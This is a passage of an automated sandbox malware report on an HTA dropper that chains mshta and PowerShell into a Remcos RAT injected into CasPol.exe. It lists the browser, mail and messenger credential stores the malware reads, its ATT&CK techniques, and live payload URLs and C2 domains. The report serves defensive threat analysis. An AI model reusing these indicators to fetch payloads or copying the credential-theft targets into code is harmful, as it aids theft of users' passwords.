                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager*
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00433E1A cpuid 12_2_00433E1A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoA,12_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,12_2_004510CA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_004470BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,12_2_004512FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,12_2_004475A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_00450D52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_00450D07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_00450DED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E7A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7B2 GetComputerNameExW,GetUserNameW,12_2_0041A7B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00448067 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00448067
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B21B, string: \AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B335, string: \AppData\Roaming\Mozilla\Firefox\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B335, string: \key3.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_004033F0, string: ESMTPPassword
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_00402DB3 _mbscpy, _mbscpy, _mbscpy, _mbscpy, RegCloseKey, string: PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_00402DB3 _mbscpy, _mbscpy, _mbscpy, _mbscpy, RegCloseKey, string: SMTPPassword
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4208, type: MEMORYSTR

Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-B3IX49
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00405042, string: cmd.exe
MITRE ATT&CK Matrix (techniques listed per tactic column, in the report's row order; a number preceding a technique is the match badge the report shows for it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 11 Native API; 1 Exploitation for Client Execution; 132 Command and Scripting Interpreter; 2 Service Execution; 3 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 422 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 422 Process Injection; HTML Smuggling; Dynamic API Resolution
Credential Access: 2 OS Credential Dumping; 111 Input Capture; 2 Credentials in Registry; 3 Credentials In Files; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 39 System Information Discovery; 31 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 1 Data from Local System; 11 Email Collection; 111 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Web Service; 12 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1575615; sample clearentirethingwithbestnot...; start date 16/12/2024; architecture WINDOWS; score 100)

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
Sample-level network: kelexrmcadmnnccupdated.duckdns.org (Uses dynamic DNS services); paste.ee (Connects to a pastebin service (likely for C&C)); 2 other IPs or domains

Process chain:
mshta.exe: Suspicious command line found; PowerShell case anomaly found; starts cmd.exe
  cmd.exe: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found; starts powershell.exe and conhost.exe
    powershell.exe: connects to 192.3.122.159 (ports 49730, 80; AS-COLOCROSSINGUS, United States); drops simplegreatfeature...gsentirelifegoi.vbS (Unicode) and C:\Users\user\AppData\...\r1df4acf.cmdline (Unicode); Loading BitLocker PowerShell Module; starts wscript.exe and csc.exe
      wscript.exe: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures; starts powershell.exe
        powershell.exe: connects to paste.ee (172.67.187.200, ports 443, 49738; CLOUDFLARENETUS, United States); Writes to foreign memory regions; Injects a PE file into a foreign processes; starts CasPol.exe and conhost.exe
          CasPol.exe: connects to kelexrmcadmnnccupdated.duckdns.org (107.173.143.31, ports 14646, 49739, 49740; AS-COLOCROSSINGUS, United States) and geoplugin.net (178.237.33.50, ports 49741, 80; ATOM86-ASATOM86NL, Netherlands); Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 7 other signatures; starts three CasPol.exe child processes
            CasPol.exe: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
            CasPol.exe: Tries to harvest and steal browser information (history, passwords, etc)
            CasPol.exe
      csc.exe: drops C:\Users\user\AppData\Local\...\r1df4acf.dll (PE32); starts cvtres.exe

Antivirus Detection (Source | Detection | Scanner | Label)
clearentirethingwithbestnoticetheeverythinggooodfrome.hta | 28% | Virustotal |
clearentirethingwithbestnoticetheeverythinggooodfrome.hta | 13% | ReversingLabs | Script-JS.Phishing.Generic
No Antivirus matches

URL Detection (Source | Detection | Scanner | Label)
http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIFLMEM | 0% | Avira URL Cloud | safe
http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF | 0% | Avira URL Cloud | safe
http://www.microsoft.h | 0% | Avira URL Cloud | safe
kelexrmcadmnnccupdated.duckdns.org | 0% | Avira URL Cloud | safe
http://192.3.122.159/ | 0% | Avira URL Cloud | safe
http://192.3.122.159/121/simpleg | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
paste.ee | 172.67.187.200 | true | false | | high
kelexrmcadmnnccupdated.duckdns.org | 107.173.143.31 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | high
res.cloudinary.com | unknown | unknown | false | | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF | true | Avira URL Cloud: safe | unknown
kelexrmcadmnnccupdated.duckdns.org | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | | high
https://paste.ee/r/pBbD1/0 | false | | high
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1793452153.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://secure.gravatar.compowershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://themes.googleusercontent.compowershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://192.3.122.159/121/simplegpowershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://github.com/dahall/taskschedulerpowershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ebuddy.comCasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              high
IP | Domain | Country | ASN | ASN name | Malicious
172.67.187.200 | paste.ee | United States | 13335 | CLOUDFLARENETUS | false
107.173.143.31 | kelexrmcadmnnccupdated.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
192.3.122.159 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575615
Start date and time: 2024-12-16 07:11:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winHTA@24/19@4/4
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 167
• Number of non-executed functions: 311
Cookbook Comments:
• Found application associated with file extension: .hta
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 2.16.96.33, 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 7372 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:11:59 | API Interceptor | 117x Sleep call for process: powershell.exe modified
01:13:09 | API Interceptor | 4025750x Sleep call for process: CasPol.exe modified
Match | Associated sample name / URL | Detection | Threat name | Context
172.67.187.200 | geHxbPNEMi.vbs | malicious | Unknown | paste.ee/d/1QtpX
172.67.187.200 | MT103-8819006.DOCS.vbs | malicious | Unknown | paste.ee/d/rYCH1
172.67.187.200 | LETA_pdf.vbs | malicious | AsyncRAT, PureLog Stealer | paste.ee/d/0jfAN
172.67.187.200 | PO 2725724312_pdf.vbs | malicious | Unknown | paste.ee/d/tiRif
172.67.187.200 | EWW.vbs | malicious | Unknown | paste.ee/d/gFlKP
172.67.187.200 | ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx | malicious | Unknown | paste.ee/d/JxxYu
